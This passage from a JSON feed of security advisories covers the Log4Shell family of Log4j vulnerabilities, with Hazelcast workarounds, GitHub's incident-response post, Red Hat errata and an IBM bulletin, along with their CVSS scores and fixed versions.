\n\nHazelcast recommends upgrading to the latest versions available.\n\n### Workarounds\nFor users that an upgrade is not an option, below mitigations can be applied.\n\n#### Disabling lookups via Environment Variable \nSetting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true .\nThis option is the easiest to apply for containerized environments.\n\n#### Disabling lookups in log4j2 configuration\nAnother good option since there is no need to replace JARs or no need to modify logging configuration file, users who cannot upgrade to 2.17.0 can mitigate the exposure by:\n\nUsers of Log4j 2.10 or greater may add `-Dlog4j2.formatMsgNoLookups=true `as a command line option or add `-Dlog4j2.formatMsgNoLookups=true` in a `log4j2.component.properties` file on the classpath to prevent lookups in log event messages.\nUsers since Log4j 2.7 may specify `%m{nolookups}` in the PatternLayout configuration to prevent lookups in log event messages.\nAs an example; users deploying Hazelcast Management Center via helm charts can do the following to disable lookups and restart in one command:\n\n`helm upgrade <release-name> hazelcast/hazelcast --set mancenter.javaOpts=\"<javaOpts> -Dlog4j2.formatMsgNoLookups=true\"`\n\nWhere <release-name> is the release name and <javaOpts> is existing java options user has added previously.\n\n#### Removing the JndiLookup from classpath\nRemove the JndiLookup and JndiManager classes from the log4j-core jar. 
Note that removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44832\nhttps://logging.apache.org/log4j/2.x/index.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [our repo](https://github.com/hazelcast/hazelcast)\n* Slack us at [Hazelcast Community Slack](https://slack.hazelcast.com/)\n", "cvss3": {}, "published": "2022-01-21T23:25:04", "type": "github", "title": "Security Advisory for \"Log4Shell\"", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2023-01-11T05:03:57", "id": "GHSA-V57X-GXFJ-484Q", "href": "https://github.com/advisories/GHSA-v57x-gxfj-484q", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-19T17:27:15", "description": "**_January 19, 2022 update: We have added details about the latest GitHub Enterprise Server release and Log4j**_\n\n \n_Today we released new versions of GitHub Enterprise Server ([3.3.2](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.2>), [3.2.7](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.7>), [3.1.15](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.15>), [3.0.23](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.23>)), which update our Log4j dependency to version 2.17.1. 
Our initial configuration-based mitigation, detailed and released in GitHub Enterprise Server versions [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>), still fully mitigates the risk of the Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. We elected to update to this latest version of Log4j as part of our normal release cycle. This upgrade will decrease false positives from file-based vulnerability scanners._\n\n \n\n**_December 17, 2021 update: we have added details of our continued response to CVE-2021-44228 and newly-discovered variants in Log4j**_\n\n \n_GitHub is tracking the latest updates regarding Log4j 2.15 and the subsequent release of Log4j 2.16 and CVE-2021-45046. This week, we have continued to monitor the impact of these variants across our products and infrastructure. Additionally, the GitHub Security Lab has engaged in further analysis to understand our products\u2019 exposure and to actively review and evaluate the effectiveness of our previous mitigations. At this time, we have not identified any additional risk or exposure to GitHub internally or to our products.\n\nDetailed updates for our products are below, with no new action required by users at this time.\n\n### GitHub Enterprise Server[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-enterprise-server>)\n\nElasticsearch is currently the only known exposure to Log4j vulnerabilities in GitHub Enterprise Server. 
We have internally validated that our mitigation approach for CVE-2021-44228 in GitHub Enterprise Server (released on December 13 in patch version [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>)) also mitigates CVE-2021-45046 and other currently-published variants impacting Log4j. Our releases follow Elasticsearch\u2019s mitigation [suggestions](<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>) and do **not** require an immediate update to Log4j 2.16.\n\nThe mitigations detailed in our December 13, 2021 post below remain effective and should be followed to secure instances of GitHub Enterprise Server.\n\n### GitHub.com and GitHub Enterprise Cloud[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-com-and-github-enterprise-cloud>)\n\nOn December 14, we finalized our rollout of mitigations for our use of Elasticsearch within GitHub.com and GitHub Enterprise Cloud. We validated this mitigation protects against both CVE-2021-44228 and CVE-2021-45046 in the context of Elasticsearch's use of Log4j. No exploitation has been identified due to our use of Elasticsearch.\n\nIn addition to Elasticsearch, we have continued investigating our impact from other third-party services in our infrastructure and are rolling out remediation and vendor recommendations as they become available. 
We are actively monitoring our telemetry for signs of exploitation and have not detected any successful exploitation at this time._\n\n* * *\n\n## December 13, 2021: our response to CVE-2021-44228[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#december-13-2021-our-response-to-cve-2021-44228>)\n\nOn Thursday, December 9, 2021, GitHub was made aware of a vulnerability in the Log4j logging framework, [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>). We immediately initiated our incident response process to determine our usage of this framework and its impact across GitHub, our products, and our infrastructure. To assist the community in identifying their usage of the vulnerable Log4j library, we also issued a [GitHub Security Advisory](<https://github.com/advisories/GHSA-jfh8-c2jp-5v3q>) and Dependabot alerts containing general vulnerability details.\n\nThis post summarizes the results of our investigation to date and our recommended next steps for customers.\n\n### GitHub Enterprise Server[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-enterprise-server>)\n\nIn GitHub Enterprise Server\u2019s recommended configuration, CVE-2021-44228 is only exposed to authenticated users. If an instance has been configured to not use [private mode](<https://docs.github.com/en/enterprise-server@3.3/admin/configuration/configuring-your-enterprise/enabling-private-mode>), this vulnerability may also be exposed to unauthenticated users. Customers should consider immediately taking one of two steps below to secure their instances of GitHub Enterprise Server.\n\n 1. Upgrade to a new version of GitHub Enterprise Server that contains changes to mitigate the Log4j vulnerability. 
The new releases that mitigate this vulnerability are [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>).\n 2. Upgrade an existing GitHub Enterprise Server instance to the latest patch release with a hotpatch by [following our hotpatch instructions](<https://docs.github.com/en/enterprise-server@3.3/admin/enterprise-management/updating-the-virtual-machine-and-physical-resources/upgrading-github-enterprise-server#upgrading-with-a-hotpatch>). This method will allow the instance to be upgraded without a maintenance window.\n\n### GitHub.com and GitHub Enterprise Cloud[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-com-and-github-enterprise-cloud>)\n\nFollowing the public vulnerability disclosure, we took immediate action on the evening of Friday, December 10 to begin mitigating any impact to GitHub.com and GitHub Enterprise Cloud. We reviewed telemetry and deployed additional monitoring, neither of which have detected any successful exploitation at this time. We continue to monitor the situation for any new developments. 
No action by users of GitHub.com or GitHub Enterprise Cloud is required in order to continue safely using GitHub.com.\n\n### Conclusion[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#conclusion>)\n\nWe are continuing to investigate our exposure to this vulnerability and will provide further updates if any new risk to our users or our products is identified.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T19:06:34", "type": "github", "title": "GitHub\u2019s response to Log4j vulnerability CVE-2021-44228", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T16:28:57", "id": "GITHUB:070AFCDE1A9C584654244E41373D86D8", "href": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2022-01-20T13:30:59", "description": "This release of Red Hat build of Eclipse Vert.x 4.1.8 GA includes security updates. 
For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T12:09:30", "type": "redhat", "title": "(RHSA-2022:0083) Moderate: Red Hat build of Eclipse Vert.x 4.1.8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T12:09:40", "id": "RHSA-2022:0083", "href": "https://access.redhat.com/errata/RHSA-2022:0083", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T11:45:59", "description": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.3 in the Release Notes [3].\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T11:36:05", "type": "redhat", "title": "(RHSA-2022:0205) Moderate: Red Hat Data Grid 8.2.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T11:36:29", "id": "RHSA-2022:0205", "href": "https://access.redhat.com/errata/RHSA-2022:0205", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T19:32:24", "description": "This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:50:57", "type": "redhat", "title": "(RHSA-2022:0222) Moderate: Red Hat Integration Camel Extensions for Quarkus 2.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:51:20", "id": "RHSA-2022:0222", "href": "https://access.redhat.com/errata/RHSA-2022:0222", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T19:28:35", "description": "A minor version update (from 1.6.2 to 1.6.3) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:51:49", "type": "redhat", "title": "(RHSA-2022:0223) Moderate: Red Hat Integration Camel-K 1.6.3 release and security update", 
"bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:52:01", "id": "RHSA-2022:0223", "href": "https://access.redhat.com/errata/RHSA-2022:0223", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T17:34:05", "description": "Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.\n\nThis asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T15:56:27", "type": "redhat", "title": "(RHSA-2022:0216) Low: Red Hat JBoss Enterprise Application Platform 7.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T15:56:55", "id": "RHSA-2022:0216", "href": "https://access.redhat.com/errata/RHSA-2022:0216", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T09:27:28", "description": "The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related 
information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T09:22:41", "type": "redhat", "title": "(RHSA-2022:0203) Critical: Red Hat Fuse 7.8-7.10 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T09:23:05", "id": "RHSA-2022:0203", "href": "https://access.redhat.com/errata/RHSA-2022:0203", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-10-01T01:44:15", "description": "## Summary\n\nIBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j as part of the logging functionality. These vulnerabilities have been addressed. 
The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. 
By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | common-transportmodule-12_0 up to and including common-transportmodule-33_2 \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | common-jnetcool-7_0 up to and including common-jnetcool-8_2 \n \n## Remediation/Fixes\n\nIBM strongly recommends fixing the vulnerabilities now by upgrading. \n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus Integration - Transport Module Common Integration Library | [common-transportmodule-33_4](<https://www.ibm.com/support/pages/node/256461> \"common-transportmodule-33_4\" ) \nIBM Tivoli Netcool/OMNIbus Integration - Java Netcool Utility Library | [common-jnetcool-8_4](<https://www.ibm.com/support/pages/node/255019> \"common-jnetcool-8_4\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response 
Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHTQ\",\"label\":\"Tivoli Netcool\\/OMNIbus\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T01:45:15", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool/OMNIbus Common Integration Libraries is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
